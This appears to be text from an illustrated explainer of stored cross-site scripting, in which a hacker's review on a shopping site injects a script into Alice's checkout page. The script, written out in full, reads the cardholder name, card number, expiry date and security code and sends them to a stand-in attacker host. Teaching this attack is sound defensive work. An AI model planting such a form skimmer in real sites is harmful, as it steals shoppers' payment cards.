Hacker Alice Server Internet Database Malicious
Server
I got her payment info!
http://a-xss-vulnerable-shopping-site.com/item/12345/review
Yellow Luxury Bag $ 999.99

Customer reviews

not_a_hacker L@@K HERE!
Dave My girl loves it.
Jane Not bad for its price.

You bought this on Dec. 20

Review star_ratestar_ratestar_ratestar_ratestar_rate
http://a-xss-vulnerable-shopping-site.com/item/12345/buy
Yellow Luxury Bag $ 999.99

Customer reviews

not_a_hacker L@@K HERE!
Dave My girl loves it.
Jane Not bad for its price.
Cardholder Name Card number Expiration date Security code
L@@K HERE!
<script>
// send card information to the hacker when user submits!
$('form').submit = function () {
    var name = $('input[name="cardholder-name"]').value,
        card = $('input[name="card-no"]').value,
        date = $('input[name="expiration-date"]').value,
        code = $('input[name="security-code"]').value;
    $("body").insertAdjacentHTML("beforeend",
        '<img src="http://the-hacker-server.com/?name="' + name 
        + "&card=" + card + "&date=" + date + "&code=" + code + '>');
}
</script>
HTTP Request HTTP Response Reviews Payment Data

Cross-site Scripting

Hacker injects some JavaScript code
into the vulnerable website...

When Alice visits the page...

--:--